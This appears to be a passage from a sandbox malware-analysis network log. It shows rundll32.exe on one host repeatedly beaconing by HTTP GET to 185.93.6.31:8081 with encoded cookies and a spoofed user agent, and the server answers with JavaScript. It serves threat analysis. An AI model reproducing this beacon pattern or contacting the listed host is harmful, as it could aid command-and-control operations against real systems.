              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=NO4zVLkZjESgKuTrHvUUK-KuxQ15HN53y8DQ027uMIqbTcgbOCUeC2mvnnM5hV4wS6u2YBtwlmR5hLdOgiLby-TlNRhbzSQmq8cTrfyehVWCA7P_Ro8G-o-gOhr4kPZDQUBrLQN4Cj4h3sIjzVh2wE-gckbV7Pu8gJH4-QEhjEhWQ1V7
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:19:50.935841084 CEST | 7019 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:19:50 GMT
              Server: cloudflare
              Content-Length: 2437
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID: 46 | Source IP: 192.168.2.7 | Source Port: 49866 | Destination IP: 185.93.6.31 | Destination Port: 8081 | Process: C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:19:53.204129934 CEST | 7023 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=92pnD3uSZd9gQDTITZ5X56ymyPFflq7YbFvI7pC0J8AX6vrbCznTRzjApulXoVIKj8aPodG-0HYrHmfQOA0aZ_j9Qs2TP_m13NgQ4ZdcBEkHoJ_VY0F8PYXTFtOk0CXrB1W-Q56wcDLQgxGT2KeIsAb6VApvc1gdGh0YaFP7EuLxJRlD
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:19:53.234618902 CEST | 7023 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:19:53 GMT
              Server: cloudflare
              Content-Length: 2223
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID: 47 | Source IP: 192.168.2.7 | Source Port: 49867 | Destination IP: 185.93.6.31 | Destination Port: 8081 | Process: C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:19:54.893625975 CEST | 7026 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=wUIBGWQrdbdmd4sYK8wW0JYFtzs2H-6GQaDIq-ShDq2yqIdoUdXxgoN9bJpeP0PV7N488x_kkh3Ex2DzvIcIetvr_Z71gj-3fVzHmEQ5z0_riuQN9c8n48l4gdBeB03oNB0lDoFO97NfhGIfNt1wsXDzXTN8XPXvUfb69R5R3qivH0j5
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:19:54.921235085 CEST | 7027 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:19:54 GMT
              Server: cloudflare
              Content-Length: 2479
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID: 48 | Source IP: 192.168.2.7 | Source Port: 49868 | Destination IP: 185.93.6.31 | Destination Port: 8081 | Process: C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:19:58.170582056 CEST | 7030 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=2KzkdVVbW2VMaDPK8rfDCg7sEiyVXglWJ4IH8oKs56t3Dx861GfJKoXtSVLVx4kRp-lhQfcyQUWVxmBvbmAM6gin4jm3j_MHR4XEjBDcUnRuQWTeqs3R22Pi7TsU0iFirQK8DO863R_NnBUCIRqh4aPipWc5riydbNMv2O1jW2m6AYJa
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:19:58.199692011 CEST | 7031 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:19:58 GMT
              Server: cloudflare
              Content-Length: 2373
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID: 49 | Source IP: 192.168.2.7 | Source Port: 49869 | Destination IP: 185.93.6.31 | Destination Port: 8081 | Process: C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:19:59.439158916 CEST | 7034 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=6xT-pWfs_HV8Pq1iUeDOTbDYUVtD6DdycCVRRIzKvmoLlGNxF0dK7SS-P0NL38ugk7gWC83ASdw3YP56JHODzeSD22ePQWAfwKaJS4sineMb3gZ_fz_ll5mtj3m4rrxBGysn6YLO6ZjM_Yg5xNkRGhqEzaBzDcG3BmOBwk-Fi0jtW4Dp
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:19:59.467138052 CEST | 7035 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:19:59 GMT
              Server: cloudflare
              Content-Length: 2458
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID: 5 | Source IP: 192.168.2.7 | Source Port: 49745 | Destination IP: 185.93.6.31 | Destination Port: 8081 | Process: C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:18:14.762335062 CEST | 1739 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=kmf3XTcOg_M1Un1ceOnglMUgQX9lOhjCEoU-77eE-OnhjXEsAvAHxtBYmt4NGrWRv_vKt0zBZFmX4pa376L-PojOC9qmp8nzLnkx3BccOQu4rxJJpurRp5pdd5QNIrusZzjTStJrAfcMoZRbZfiG9SPWq3cveQOrAtMMsU10KOz8Or69
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:18:14.796147108 CEST | 1739 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:18:14 GMT
              Server: cloudflare
              Content-Length: 2287
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID: 50 | Source IP: 192.168.2.7 | Source Port: 49870 | Destination IP: 185.93.6.31 | Destination Port: 8081 | Process: C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:20:01.236423969 CEST | 7038 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=7OY85EmPSEpL07blBmgrLbuhisYbu9N7bAT1VskFM1CfDLqVfHHMf67ZUWdzm34owXoBDjJAr-DpY10OkSM1h_ZPwGPYJgJKUPj6ZWmd8rLGLtnw2GsaHuTcvC1zo3AVGbkY86zqyk5yIF_iG3lNTF1XYM5R-MgSfFLHCDP141WCu3UE
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:20:01.265721083 CEST | 7038 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:20:01 GMT
              Server: cloudflare
              Content-Length: 2330
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID: 51 | Source IP: 192.168.2.7 | Source Port: 49871 | Destination IP: 185.93.6.31 | Destination Port: 8081 | Process: C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:20:03.797141075 CEST | 7042 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=xB6RwEnpLtBQ2kZ_7gW2vxJeZ5mJ7HzjOzByR54ekh5rvWqPyNW8n5lfPOfJdfyku1sU9OuANPCJdBXactJ5XxQVl4yrPYayWzexOQxuJ8Fy8xFrtn-kbn9QmI4IYFTXsbDJufOIqKrRLmC3PajUVL9Q0NIlHFkocGFabfHRLtyms_fv
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:20:03.826020002 CEST | 7042 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:20:03 GMT
              Server: cloudflare
              Content-Length: 2479
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID: 52 | Source IP: 192.168.2.7 | Source Port: 49872 | Destination IP: 185.93.6.31 | Destination Port: 8081 | Process: C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:20:06.973078012 CEST | 7046 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=23bv4FeO7TBMXLwnYYLfCIC6QB5ziiY3QEdAAbyory879nI0JyVbqBTcLgZ7vdrlo9oHTv2iWJkHAu8_FBGSiNThyiK_I3Fa8MSYDrtAjKYrvBc6T1300qnPnjyIzK0EK0k2rLKs-N38n5l89LsAXyrm3OVDb9DyNgGQh3_nmg3dOZGs
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:20:07.000771999 CEST | 7046 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:20:06 GMT
              Server: cloudflare
              Content-Length: 2351
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID: 53 | Source IP: 192.168.2.7 | Source Port: 49873 | Destination IP: 185.93.6.31 | Destination Port: 8081 | Process: C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:20:10.817368031 CEST | 7050 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=gxJkDCZ7EKIkJ-4NaZxzxdRV0i50T4uTA_Ctvqbxa7jw-OJ9E4WUl8EtCY8cbybAro5Z5l209wiGlwXm_tdtb5m7mIu30lqiPwyijQZpqlqp2oEYt59C9oso5MUcVyj9dk1AG8MekqYd1AcKdI0VpDKjOCY-DJD6E6af4FwBu73tTy3s
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:20:10.845988989 CEST | 7050 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:20:10 GMT
              Server: cloudflare
              Content-Length: 2351
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID: 54 | Source IP: 192.168.2.7 | Source Port: 49874 | Destination IP: 185.93.6.31 | Destination Port: 8081 | Process: C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:20:13.441013098 CEST | 7054 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=WCtMTtXc817M75vxcjBrMY5ruhcV2aFtpwWvyQIrT5D3iLcBVOBhEQVq4WlVQCEqJ27Jene16X4VQchU7uek0YggSgI3CFs8xwJst5Bb-k_uxszlKkp54ONlRQCUVYlZLYUUN2-9dSRNG705oZ0J2iNlDVy5KYSm7FSH423k81I6hiph
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:20:13.469932079 CEST | 7054 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:20:13 GMT
              Server: cloudflare
              Content-Length: 2394
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID: 55 | Source IP: 192.168.2.7 | Source Port: 49875 | Destination IP: 185.93.6.31 | Destination Port: 8081 | Process: C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:20:13.492178917 CEST | 7057 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=1IRqMVh8aOFDrjn2bnBa2Y9Ixc98eKPmT7XF0LNaKv40BPflKNfeeRsuq9d0T180rCiCn_JQ3UgI8GruG-MXWdsTT_Ow0fSL_zYd37SyCXckTpLrQK9xA6Y9G-2HPijVJLuzfb1efQzzbRyt-0mFjiUUWTRMnVUjOfMVVnAVH9zSyxR9
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:20:13.521492004 CEST | 7058 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:20:13 GMT
              Server: cloudflare
              Content-Length: 2202
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID: 56 | Source IP: 192.168.2.7 | Source Port: 49876 | Destination IP: 185.93.6.31 | Destination Port: 8081 | Process: C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:20:17.146400928 CEST | 7061 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=LCNUaYlKIMeLFt5oxq1DoHtk4kvbfrv2rMGd2wnAW91fydIYvLSk8m4cOeqzXhalAb9pg_KFx20ppjWDUeZdCjaKqO4Y42rHkD2S6KlYmj8G67F9GK5ykyQZ1KCzZhiY2XxwfmwvosOy5Tdv27wlwZ2SCEORPaCfvJevhfMwi9hCfh2J
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:20:17.182154894 CEST | 7061 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:20:17 GMT
              Server: cloudflare
              Content-Length: 2309
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID: 57 | Source IP: 192.168.2.7 | Source Port: 49877 | Destination IP: 185.93.6.31 | Destination Port: 8081 | Process: C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:20:20.946939945 CEST | 7065 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=wvwn9k8LmOZWOPBJ6OcAiRS80a-PDsrVPdLEcZj8JChtX9y5zjcKqZ-9itHPl0qSvbmiwu1igsaPlqPsdDDPaRL3Ibqt3zCEXdUHDwqMkfd0EaddsJ0SWHmyLrgOguLht1J_j_VqHpzXzNaBO0piYrmyZuQj_u8edoPsW_czmOqgUUHZ
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:20:20.977343082 CEST | 7065 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:20:20 GMT
              Server: cloudflare
              Content-Length: 2287
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID: 58 | Source IP: 192.168.2.7 | Source Port: 49878 | Destination IP: 185.93.6.31 | Destination Port: 8081 | Process: C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:20:22.483541965 CEST | 7069 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=F3tSopuDUHKAUQFlrY9iSky3_Vy_h5t1jEr9Q3ClEm33-8926yjm6tjRk0S3sGenb9e6DDGv5dvLD1J92Bwvyhjsd2BzLswYPMklTHdNMeTnsap4g1BJkGXCI35EwRBG50SL7n6hRZ8wkiQ-OLa9HebrYaePYm2w-gwtxbPqJ08RNCzu
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:20:22.515856981 CEST | 7069 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:20:22 GMT
              Server: cloudflare
              Content-Length: 2309
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID: 59 | Source IP: 192.168.2.7 | Source Port: 49879 | Destination IP: 185.93.6.31 | Destination Port: 8081 | Process: C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:20:23.074126005 CEST | 7072 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=MwlQXZZgJPOUPNpc2YdHlGRO5n_EVL_Cs-uZ7xbqX-lA49Yso56gxnE2Pd6sdBKRHpVtt-2vw1k2jDG3TsxZPimgrNoHyW7zjxeW3LZyngsZwbVJB4R2pzsz0JSsTBysxlZ0SnMFpvetzzNbxJYh9YK4DHeOF6Sro72rsewaj-xdVBm9
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:20:23.149509907 CEST | 7073 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:20:23 GMT
              Server: cloudflare
              Content-Length: 2415
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID: 6 | Source IP: 192.168.2.7 | Source Port: 49746 | Destination IP: 185.93.6.31 | Destination Port: 8081 | Process: C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:18:17.135066986 CEST | 1743 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=rr1CTCJFQJw5lxGLFElypPVx7bIGQYubNYztrcljAoNOPd-YUu72BGEXg6oOdndJ1hGq4ohp9TVyyUKTYdo_JKEqZ47K6Nz2hQ81os6LIQped7qWOpZZftwEM5D9BwCoXoKbAMdnVXGJVDTQgXCt818tcUk2pH1eQ8o9KwosN6Go8jwA
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:18:17.167481899 CEST | 1743 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:18:17 GMT
              Server: cloudflare
              Content-Length: 2287
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID: 60 | Source IP: 192.168.2.7 | Source Port: 49880 | Destination IP: 185.93.6.31 | Destination Port: 8081 | Process: C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:20:30.613892078 CEST | 7077 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=VumxgtoRs1LBw-JF7B2Bag0lHnz-FXhVzdgeYzE38U22aSxWqroFyplDcGT2IoSHLkVZLHA9BvuKnbFdmY7M6ll-lEAyvC84fVvGbDbf0sSmI0lYwsKqsCRQwF4FU_NmptZozj8zpr9xAMceeSRePad5gofO8I6Qu57O5fJ4xG9Qps_O
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:20:30.643462896 CEST | 7078 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:20:30 GMT
              Server: cloudflare
              Content-Length: 2373
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID: 61 | Source IP: 192.168.2.7 | Source Port: 49881 | Destination IP: 185.93.6.31 | Destination Port: 8081 | Process: C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:20:31.003053904 CEST | 7081 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=cSQEdPzTu2Tl4NPLWz8jC6dk8i081ulXjgrn8yskB6reh_87fe8pKyxlqVN8T2kQDmGBQF66oUQ8ToBux-js66EvAjgeBxMG7g0kjblUsnXHyYTfA0Ux2spqDTq9WsFjBIpcDUayPR5kFPUDiJJB4ApqRWaQJsycxVvP2UTru2gTiWJb
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:20:31.033652067 CEST | 7081 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:20:31 GMT
              Server: cloudflare
              Content-Length: 2223
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID: 62 | Source IP: 192.168.2.7 | Source Port: 49882 | Destination IP: 185.93.6.31 | Destination Port: 8081 | Process: C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:20:32.096389055 CEST | 7085 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=njlWhztQIik5DNyGdLdBTsl-4KVpZLkYHtufNbvaWTPt09D2Dq6mHNwGOwQBRBRLs6VrbUCfxYObvDdt4_xf5ISQqgCq-WgpIieQBhtCmNG08bOTqrRwfZYD1k4BfBp2a2ZykN41oC0A_zWBaaYnLy-ICq0jJ6JxDo2ta0EqiTbwZB9n
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:20:32.125711918 CEST | 7085 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:20:32 GMT
              Server: cloudflare
              Content-Length: 2223
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID: 63 | Source IP: 192.168.2.7 | Source Port: 49883 | Destination IP: 185.93.6.31 | Destination Port: 8081 | Process: C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:20:38.280667067 CEST | 7088 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=v57xvjJpTq4rWiYBlYXWwWneB-fybBydQLASOeWe8mAQPQrxs1Xc4eLfXJmy9ZzawNt0ipAAVI7y9HWkCVIZIW-V9_LQvebMILfRR3fuR78Jc3EVzf_EEATQ-PBz4DSpyjCpx4gIyNSqrgDJRii0KsTQsKxenDlWC-E6E4pRTqLdM5eR
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:20:38.308800936 CEST | 7089 | IN | HTTP/1.1 200 OK
